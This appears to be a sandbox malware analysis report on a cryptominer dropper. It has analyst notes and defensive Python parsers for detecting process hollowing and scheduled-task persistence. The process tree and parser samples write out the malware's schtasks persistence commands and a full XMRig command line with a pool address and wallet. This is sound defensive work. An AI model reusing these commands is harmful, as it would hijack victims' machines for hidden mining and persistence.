Analysis
- max time kernel: 150s
- max time network: 116s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 19-07-2021 00:03
- Static task: static1
- Behavioral task: behavioral1
- Sample: Software updated v2.6.0.exe
- Resource: win7v20210410
General
- Target: Software updated v2.6.0.exe
- Size: 256KB
- MD5: 18d05e20731583a22b495d0d1f107c5b
- SHA1: 2ced0e3577063ca3613b43661e7df5bc1411ab09
- SHA256: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
- SHA512: 36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Memory regions matched by the yara rule "xmrig":
- behavioral1/memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp
- behavioral1/memory/856-120-0x00000001402EB66C-mapping.dmp
- behavioral1/memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp
All three hits are in PID 856, which is C:\Windows\explorer.exe (see the process tree below), not in any of the dropped files. The matched region starts at 0x140000000, the default image base of a 64-bit PE, which is consistent with a miner image being written into explorer.exe rather than loaded from disk.
-
Executes dropped EXE 6 IoCs
Processes (pid, image):
- 1812 xmrmine.exe
- 1296 etcmin.exe
- 1876 serverpatch.exe
- 1536 rtksmbs.exe
- 1712 sihost64.exe
- 540 sihost32.exe
-
Loads dropped DLL 6 IoCs
Processes (pid, image):
- 1672 Software updated v2.6.0.exe (2 IoCs)
- 1296 etcmin.exe
- 1812 xmrmine.exe
- 1876 serverpatch.exe
- 1536 rtksmbs.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes (pid, process, target):
- PID 1876 serverpatch.exe set thread context of PID 856 explorer.exe
Read together with the WriteProcessMemory records below (16 writes from 1876 into 856) and the xmrig YARA hits on 856's memory, this is the classic process-hollowing sequence: serverpatch.exe starts explorer.exe, overwrites its image with the miner and redirects the thread to the new code.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox attaches a generic "likely ransomware behaviour" description to this signature; nothing else in this report (no file encryption, no ransom note, an XMRig payload) supports that reading here, so treat the TTP as storage enumeration of unknown purpose rather than as a ransomware indicator.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, image):
- 1480 schtasks.exe
- 932 schtasks.exe
- 1756 schtasks.exe
- 1864 schtasks.exe
-
Modifies system certificate store 5 IoCs
Processes (process, description, ioc):
- rtksmbs.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
- rtksmbs.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob value not captured in this extract)
- serverpatch.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25
- serverpatch.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob value not captured in this extract), written three times
The key names under AuthRoot\Certificates are SHA1 thumbprints. 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 is exactly the SHA1 of the file C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E listed under Downloads, i.e. the blob written here is content that CryptoAPI itself fetched and cached. That is the footprint of Windows' automatic root-certificate update, triggered when a process builds a certificate chain, rather than of the sample installing a CA of its own. It is still worth confirming both thumbprints against the Microsoft trusted root list on a real host, but on this evidence the signature is a side effect of the dropped binaries, not a deliberate trust-store modification.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes (pid, image):
- 1296 etcmin.exe
- 1812 xmrmine.exe
- 1536 rtksmbs.exe
- 1876 serverpatch.exe
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes (description, pid, image):
- Token: SeDebugPrivilege 1296 etcmin.exe
- Token: SeDebugPrivilege 1812 xmrmine.exe
- Token: SeDebugPrivilege 1536 rtksmbs.exe
- Token: SeDebugPrivilege 1876 serverpatch.exe
- Token: SeLockMemoryPrivilege 856 explorer.exe
- Token: SeLockMemoryPrivilege 856 explorer.exe
SeDebugPrivilege in the four stage binaries is what they need to write into other processes. SeLockMemoryPrivilege in PID 856 is the privilege XMRig enables to allocate large pages for RandomX; explorer.exe asking for it is, by itself, a strong anomaly to alert on.
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes (pid, process, target process; the report lists every call as a separate IoC, the number of calls per pair is given in brackets):
- 1672 Software updated v2.6.0.exe wrote to 1812 xmrmine.exe [4]
- 1672 Software updated v2.6.0.exe wrote to 1296 etcmin.exe [4]
- 1296 etcmin.exe wrote to 920 cmd.exe [3]
- 1812 xmrmine.exe wrote to 1888 cmd.exe [3]
- 920 cmd.exe wrote to 932 schtasks.exe [3]
- 1888 cmd.exe wrote to 1480 schtasks.exe [3]
- 1812 xmrmine.exe wrote to 1876 serverpatch.exe [3]
- 1296 etcmin.exe wrote to 1536 rtksmbs.exe [3]
- 1536 rtksmbs.exe wrote to 1152 cmd.exe [3]
- 1876 serverpatch.exe wrote to 1980 cmd.exe [3]
- 1152 cmd.exe wrote to 1864 schtasks.exe [3]
- 1980 cmd.exe wrote to 1756 schtasks.exe [3]
- 1876 serverpatch.exe wrote to 1712 sihost64.exe [3]
- 1536 rtksmbs.exe wrote to 540 sihost32.exe [3]
- 1876 serverpatch.exe wrote to 856 explorer.exe [16]
Every ordinary parent/child pair in this run shows three or four writes, which appears to be the sandbox's baseline for a plain CreateProcess. The 16 writes from serverpatch.exe into explorer.exe stand out, and together with the SetThreadContext call on the same target and the xmrig YARA match at 0x140000000 in PID 856 they describe the miner being injected into explorer.exe.
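The WriteProcessMemory and SetThreadContext tables above are flattened into one run of text, which makes the 16-versus-3 pattern easy to miss. The following Python is an added example, not part of the report or the sample: it parses records in exactly the shape shown above, counts writes per parent/target pair and flags the pair that also received SetThreadContext as a hollowing candidate. The input is a constructed excerpt of the report's records (the 16 identical serverpatch.exe to explorer.exe lines are generated by repetition), and the "baseline" of 4 writes per ordinary child is an assumption taken from this run.

```python
import re
from collections import Counter

# Constructed sample: a subset of the "wrote to memory of" / "set thread context of"
# records from the report above, flattened the way the page shows them.  The 16
# identical serverpatch.exe -> explorer.exe records are generated by repetition.
SAMPLE_RECORDS = " ".join([
    "PID 1672 wrote to memory of 1812 1672 Software updated v2.6.0.exe xmrmine.exe " * 4,
    "PID 1812 wrote to memory of 1876 1812 xmrmine.exe serverpatch.exe " * 3,
    "PID 1876 wrote to memory of 1980 1876 serverpatch.exe cmd.exe " * 3,
    "PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe " * 16,
    "PID 1876 set thread context of 856 1876 serverpatch.exe explorer.exe",
])

# One record reads "PID <src> <api> <dst> <src> <src image> <dst image>".  The
# source image may contain spaces ("Software updated v2.6.0.exe"), so it is
# matched lazily up to ".exe"; the target image is the last token before the
# next "PID" or the end of the text.
RECORD_RE = re.compile(
    r"PID (?P<src>\d+) (?P<api>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) (?P=src) (?P<src_image>.+?\.exe) (?P<dst_image>\S+\.exe)"
    r"(?= PID |\s*$)"
)


def parse_records(text):
    """Turn the flattened signature text into a list of structured records."""
    flat = " ".join(text.split())  # also re-joins records broken across lines
    return [
        {
            "api": m["api"],
            "src_pid": int(m["src"]),
            "src_image": m["src_image"],
            "dst_pid": int(m["dst"]),
            "dst_image": m["dst_image"],
        }
        for m in RECORD_RE.finditer(flat)
    ]


def edge_counts(records, api="wrote to memory of"):
    """Number of calls of one API per (source pid, target pid) pair."""
    return Counter((r["src_pid"], r["dst_pid"]) for r in records if r["api"] == api)


def hollowing_candidates(records, baseline=4):
    """Targets that got SetThreadContext from a process that also wrote into
    them more than `baseline` times.

    `baseline` is an assumption for this example: every ordinary parent/child
    pair in the report shows 3 or 4 writes, so anything above that is unusual.
    """
    writes = edge_counts(records)
    found = []
    for r in records:
        if r["api"] != "set thread context of":
            continue
        n = writes.get((r["src_pid"], r["dst_pid"]), 0)
        if n > baseline:
            found.append({**r, "write_count": n})
    return found


if __name__ == "__main__":
    records = parse_records(SAMPLE_RECORDS)
    for (src, dst), n in sorted(edge_counts(records).items()):
        print(f"{src} -> {dst}: {n} WriteProcessMemory calls")
    for c in hollowing_candidates(records):
        print(f"hollowing candidate: {c['src_image']} ({c['src_pid']}) -> "
              f"{c['dst_image']} ({c['dst_pid']}), "
              f"{c['write_count']} writes followed by SetThreadContext")
```

The same parser works on the full table: paste the two signature blocks into `SAMPLE_RECORDS` and the only candidate remains PID 856. The baseline is deliberately a parameter, because a different sandbox (or a different hook set) records a different number of writes per CreateProcess.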
Processes (indentation shows the depth in the tree; PIDs are taken from the signature tables above)

[1] "C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"  (PID 1672)
    signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Roaming\xmrmine.exe  (PID 1812)
        signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        [3] "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit  (PID 1888)
            signatures: Suspicious use of WriteProcessMemory
            [4] schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'  (PID 1480)
                signatures: Creates scheduled task(s)
        [3] "C:\Users\Admin\appdata\roaming\serverpatch.exe"  (PID 1876)
            signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; Modifies system certificate store; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            [4] "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit  (PID 1980)
                signatures: Suspicious use of WriteProcessMemory
                [5] schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'  (PID 1756)
                    signatures: Creates scheduled task(s)
            [4] "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"  (PID 1712)
                signatures: Executes dropped EXE
            [4] C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth  (PID 856)
                signatures: Suspicious use of AdjustPrivilegeToken
    [2] C:\Users\Admin\AppData\Roaming\etcmin.exe  (PID 1296)
        signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        [3] "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit  (PID 920)
            signatures: Suspicious use of WriteProcessMemory
            [4] schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'  (PID 932)
                signatures: Creates scheduled task(s)
        [3] "C:\Users\Admin\appdata\roaming\rtksmbs.exe"  (PID 1536)
            signatures: Executes dropped EXE; Loads dropped DLL; Modifies system certificate store; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            [4] "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit  (PID 1152)
                signatures: Suspicious use of WriteProcessMemory
                [5] schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'  (PID 1864)
                    signatures: Creates scheduled task(s)
            [4] "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"  (PID 540)
                signatures: Executes dropped EXE

Reading the tree:
- The dropper (PID 1672) starts two parallel chains that differ only in file names: xmrmine.exe, then serverpatch.exe, then sihost64.exe on one side, and etcmin.exe, then rtksmbs.exe, then sihost32.exe on the other. The Downloads section shows that xmrmine.exe and serverpatch.exe have identical hashes, as do etcmin.exe and rtksmbs.exe, so each stage simply re-drops itself under the next name.
- Persistence is a logon-triggered scheduled task per chain (/sc onlogon /rl highest) whose action is the copy in the user's AppData\Roaming folder. Each task is created twice, once by the stage-1 binary and again by the persisted stage-2 binary; /f makes the second call overwrite the first silently. In the sandbox the user is Admin, so /rl highest yields an elevated task.
- The miner never runs from a file. serverpatch.exe (PID 1876) starts C:\Windows\explorer.exe, writes the XMRig image into it (16 WriteProcessMemory calls, the 7.3MB region at 0x140000000 matched by the xmrig rule) and redirects its thread with SetThreadContext. Because the arguments are passed on explorer.exe's command line they are fully visible: RandomX (rx/0, i.e. Monero), pool pool.hashvault.pro on port 80, the wallet in --user, an empty --pass, CPU usage capped at 40% of threads (--cpu-max-threads-hint=40).
- The --cinit-* options (find-x, idle-wait, idle-cpu, stealth) are not options of upstream XMRig; they identify a custom build, and their names suggest throttling to idle periods and hiding the mining process. The remaining switches (--algo, --asm, --cpu-memory-pool, --randomx-mode, --randomx-no-rdmsr, --cuda-bfactor-hint, --cuda-bsleep-hint, --url, --user, --pass, --cpu-max-threads-hint, -B) are standard XMRig.
- Hunting hooks that fall out of this tree: schtasks.exe creating an onlogon task whose /tr points under \AppData\Roaming\; cmd.exe spawned by a binary in AppData\Roaming; explorer.exe started by a non-system parent with a long non-path command line; explorer.exe requesting SeLockMemoryPrivilege; and outbound TCP from explorer.exe to port 80 that does not carry HTTP (XMRig speaks stratum, not HTTP, regardless of the port).
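Both things a responder needs from this tree, the persistence parameters and the miner configuration, sit inside command-line strings. The following Python is an added example, not code from the report or from the sample: it extracts the schtasks parameters from the cmd.exe wrappers, flags the ones that match the persistence pattern seen here, and breaks the XMRig command line down into pool, wallet and options. The command lines are a constructed sample copied from the tree above; the set of option names treated as upstream XMRig options is maintained by hand in the example, and the path check for "user-writable location" is an assumption limited to AppData.

```python
import re

# Constructed sample: command lines copied from the process tree above, keyed by
# PID.  Only the cmd.exe wrappers carry the schtasks command, which is all the
# parser needs; the bare schtasks.exe children are omitted.
MINER_CMD = (
    r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 "
    r"--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 "
    r"--url=pool.hashvault.pro:80 "
    r"--user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ "
    r"--pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth"
)
PROCESS_TREE = [
    (1672, r'''"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"'''),
    (1812, r'''C:\Users\Admin\AppData\Roaming\xmrmine.exe'''),
    (1888, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit'''),
    (1876, r'''"C:\Users\Admin\appdata\roaming\serverpatch.exe"'''),
    (1980, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit'''),
    (856, MINER_CMD),
    (1296, r'''C:\Users\Admin\AppData\Roaming\etcmin.exe'''),
    (920, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit'''),
    (1536, r'''"C:\Users\Admin\appdata\roaming\rtksmbs.exe"'''),
    (1152, r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit'''),
]

# Everything after "schtasks /create", minus the trailing "& exit" of the cmd wrapper.
SCHTASKS_RE = re.compile(r"schtasks\s+/create\b(?P<args>.*?)(?:\s*&\s*exit)?\s*$", re.I)

# Option names the author knows to exist in upstream XMRig; anything else on the
# command line is reported as a non-upstream (custom build) option.
UPSTREAM_XMRIG_OPTIONS = {
    "-B", "--url", "--user", "--pass", "--algo", "--asm", "--cpu-memory-pool",
    "--randomx-mode", "--randomx-no-rdmsr", "--cuda-bfactor-hint",
    "--cuda-bsleep-hint", "--cpu-max-threads-hint",
}
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def _switch(args, name, value_pattern=r"(\S+)"):
    m = re.search(r"/" + name + r"\s+" + value_pattern, args, re.I)
    return m.group(1) if m else None


def parse_schtasks(cmdline):
    """Persistence-relevant parameters of a `schtasks /create`, or None."""
    m = SCHTASKS_RE.search(cmdline)
    if not m:
        return None
    args = m.group("args")
    return {
        "task": _switch(args, "tn", r'"([^"]+)"'),
        "schedule": (_switch(args, "sc") or "").lower(),
        "runlevel": (_switch(args, "rl") or "").lower(),
        # /tr arrives as '"c:\path\x.exe"' after the cmd.exe quoting; strip both quote kinds
        "target": _switch(args, "tr", r"""['"]+([^'"]+)"""),
        "force": re.search(r"\s/f(?=\s|$)", args, re.I) is not None,
    }


def persistence_findings(tree):
    """Scheduled-task creations that look like the pattern in this report."""
    findings = []
    for pid, cmdline in tree:
        task = parse_schtasks(cmdline)
        if not task:
            continue
        target = (task["target"] or "").lower()
        reasons = []
        if "\\appdata\\roaming\\" in target or "\\appdata\\local\\" in target:
            reasons.append("task action lives in a user-writable AppData path")
        if task["runlevel"] == "highest":
            reasons.append("runs with highest privileges (/rl highest)")
        if task["schedule"] == "onlogon":
            reasons.append("re-executes at every logon (/sc onlogon)")
        if reasons:
            findings.append({"pid": pid, **task, "reasons": reasons})
    return findings


def parse_xmrig_args(cmdline):
    """Split an xmrig-style command line into pool, wallet and option map."""
    options = {}
    for tok in cmdline.split()[1:]:          # [0] is the image path
        if not tok.startswith("-"):
            continue
        key, sep, value = tok.partition("=")
        options[key] = value if sep else None
    pool = None
    if options.get("--url"):
        host, _, port = options["--url"].rpartition(":")
        pool = (host, int(port)) if port.isdigit() else (options["--url"], None)
    return {
        "pool": pool,
        "user": options.get("--user"),
        "options": options,
        "non_upstream": [k for k in options if k not in UPSTREAM_XMRIG_OPTIONS],
    }


def is_monero_address(s):
    """Standard Monero address: 95 base58 chars starting with 4 (or 8 for subaddresses)."""
    return len(s) == 95 and s[0] in "48" and set(s) <= BASE58


if __name__ == "__main__":
    for f in persistence_findings(PROCESS_TREE):
        print(f"PID {f['pid']}: task {f['task']} -> {f['target']}: " + "; ".join(f["reasons"]))
    miner = parse_xmrig_args(MINER_CMD)
    print("pool:", miner["pool"], "wallet ok:", is_monero_address(miner["user"]))
    print("non-upstream options:", miner["non_upstream"])
```

On a real host the same two parsers can be pointed at process-creation telemetry (Sysmon event 1 or Windows 4688 with command-line auditing); the schtasks parser ignores everything that is not a `/create`, so it is safe to run over a whole day of cmd.exe events.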
Network
No network IoCs are present in this extract. The only external endpoint named anywhere in the report is the mining pool pool.hashvault.pro:80 on explorer.exe's command line; the CryptnetUrlCache files under Downloads show that CryptoAPI also fetched certificate data, but the URL is not recorded.
MITRE ATT&CK Matrix ATT&CK v6
Downloads
Files written or cached during the run. The report repeats several entries under alternative spellings of the same path (drive letter omitted, different letter case) with identical hashes; each file is listed once here, with the label prefixes ("MD5", "SHA1", ...) separated from the values they were fused with.
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5 2902de11e30dcc620b184e3bb0f0c1cb
SHA1 5d11d14a2558801a2688dc2d6dfad39ac294f222
SHA256 e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
SHA512 efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5 d474de575c39b2d39c8583c5c065498a
SHA1 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
SHA256 7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
SHA512 7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5 f3c6c3bbbfd1a9ecc7b8b39244914347
SHA1 bdd6d74b592ad8e93a7189d4a6abb4815bb5cd3f
SHA256 653d9ce52affe145ce930b52bbfceb138cb0f689ce28017842af3355b50d544d
SHA512 56cd7b0d3282e3d58b8b6c8170ecf31812f89c873c0048ce7479ed63a6da7d723de09c91c44ad0c7e3381abe3e246de96fe159f52f5808f686224f327e54c96a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5 c02d5bb6ca1f2bfcedfcc810ab6c0d70
SHA1 3f84e98b1acb842295b373de45b542b63cdce65b
SHA256 2919035d4e34a77b344953d111425dd1d92b111d57c10c77b0d82a4b732f10d6
SHA512 202b0d44d64b9346dfa4539fdfc8b2d227263e1cf36f82e785bcc035f4c9a74d19792d6dc40bec01f16a5035be60957f07c6de0cdd11006d3bf09262b543919d
-
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
(also listed as C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe and \Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe)
MD5 f20a5085dbb85927b25ed46a45fe0a13
SHA1 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA512 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
(also listed as C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe and \Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe)
MD5 e149663730c0b03c8936baffe9645bb4
SHA1 c0fb146c35d48481df4149027953e4ab7be59e95
SHA256 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\AppData\Roaming\etcmin.exe
(also listed as \Users\Admin\AppData\Roaming\etcmin.exe)
MD5 406f2550d0d4b9b3e2f47994076e8b8b
SHA1 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA256 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA512 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\rtksmbs.exe
(also listed as C:\Users\Admin\appdata\roaming\rtksmbs.exe and \Users\Admin\AppData\Roaming\rtksmbs.exe; same hashes as etcmin.exe)
MD5 406f2550d0d4b9b3e2f47994076e8b8b
SHA1 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA256 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA512 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\serverpatch.exe
(also listed as C:\Users\Admin\appdata\roaming\serverpatch.exe and \Users\Admin\AppData\Roaming\serverpatch.exe)
MD5 973037113a1f50e0ca79d3cc42a5ef66
SHA1 78235c164ebfa47d613a100abf5c64bed10c1036
SHA256 a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512 d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exe
(also listed as \Users\Admin\AppData\Roaming\xmrmine.exe; same hashes as serverpatch.exe)
MD5 973037113a1f50e0ca79d3cc42a5ef66
SHA1 78235c164ebfa47d613a100abf5c64bed10c1036
SHA256 a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512 d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
Notes on the file list:
- Four distinct binaries were dropped under two names each: xmrmine.exe and serverpatch.exe are the same file (stage 2), etcmin.exe and rtksmbs.exe are the same file (stage 2 of the second chain), and sihost64.exe / sihost32.exe are two further distinct payloads. Blocking on the four unique hashes covers all eight paths.
- The CryptnetUrlCache entries are not dropped by the sample; they are CryptoAPI's download cache. The SHA1 of the FB5E2F83CE9B8330B0590B7CD2E5FF2E content file, 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25, equals the thumbprint key that serverpatch.exe created under AuthRoot\Certificates (signature "Modifies system certificate store" above), which ties that signature to an automatic root-certificate fetch rather than to a deliberate trust-store change.
Memory dumps (dump name, size; "mapping.dmp" entries record the address at which a mapping or thread redirection was observed and carry no size)
- memory/540-114-0x0000000002080000-0x0000000002082000-memory.dmp, 8KB
- memory/540-103-0x0000000000000000-mapping.dmp
- memory/540-108-0x000000013FAE0000-0x000000013FAE1000-memory.dmp, 4KB
- memory/856-123-0x00000000002C0000-0x00000000002E0000-memory.dmp, 128KB
- memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp, 7.3MB
- memory/856-120-0x00000001402EB66C-mapping.dmp
- memory/856-125-0x00000000002E0000-0x0000000000300000-memory.dmp, 128KB
- memory/856-124-0x00000000002C0000-0x00000000002E0000-memory.dmp, 128KB
- memory/856-121-0x00000000000E0000-0x0000000000100000-memory.dmp, 128KB
- memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp, 7.3MB
- memory/920-75-0x0000000000000000-mapping.dmp
- memory/932-77-0x0000000000000000-mapping.dmp
- memory/1152-95-0x0000000000000000-mapping.dmp
- memory/1296-79-0x000000001C810000-0x000000001C812000-memory.dmp, 8KB
- memory/1296-73-0x0000000000850000-0x0000000000856000-memory.dmp, 24KB
- memory/1296-69-0x000000013F2F0000-0x000000013F2F1000-memory.dmp, 4KB
- memory/1296-65-0x0000000000000000-mapping.dmp
- memory/1480-78-0x0000000000000000-mapping.dmp
- memory/1536-111-0x00000000022B0000-0x00000000022B2000-memory.dmp, 8KB
- memory/1536-89-0x000000013F780000-0x000000013F781000-memory.dmp, 4KB
- memory/1536-84-0x0000000000000000-mapping.dmp
- memory/1672-60-0x0000000075971000-0x0000000075973000-memory.dmp, 8KB
- memory/1712-100-0x0000000000000000-mapping.dmp
- memory/1712-107-0x000000013F250000-0x000000013F251000-memory.dmp, 4KB
- memory/1712-113-0x000000001BDA0000-0x000000001BDA2000-memory.dmp, 8KB
- memory/1756-98-0x0000000000000000-mapping.dmp
- memory/1812-80-0x00000000008B0000-0x00000000008B2000-memory.dmp, 8KB
- memory/1812-62-0x0000000000000000-mapping.dmp
- memory/1812-70-0x000000013FA00000-0x000000013FA01000-memory.dmp, 4KB
- memory/1812-74-0x0000000000860000-0x0000000000869000-memory.dmp, 36KB
- memory/1864-97-0x0000000000000000-mapping.dmp
- memory/1876-83-0x0000000000000000-mapping.dmp
- memory/1876-90-0x000000013F780000-0x000000013F781000-memory.dmp, 4KB
- memory/1876-112-0x000000001CA50000-0x000000001CA52000-memory.dmp, 8KB
- memory/1888-76-0x0000000000000000-mapping.dmp
- memory/1980-96-0x0000000000000000-mapping.dmp
The two 7.3MB dumps of PID 856 (856-119 and 856-122) are the injected miner image at 0x140000000, the region the xmrig rule matched; 0x00000001402EB66C from 856-120 lies inside that region and is the address the hollowed thread was pointed at. For an offline look at the miner, these two dumps are the ones to carve.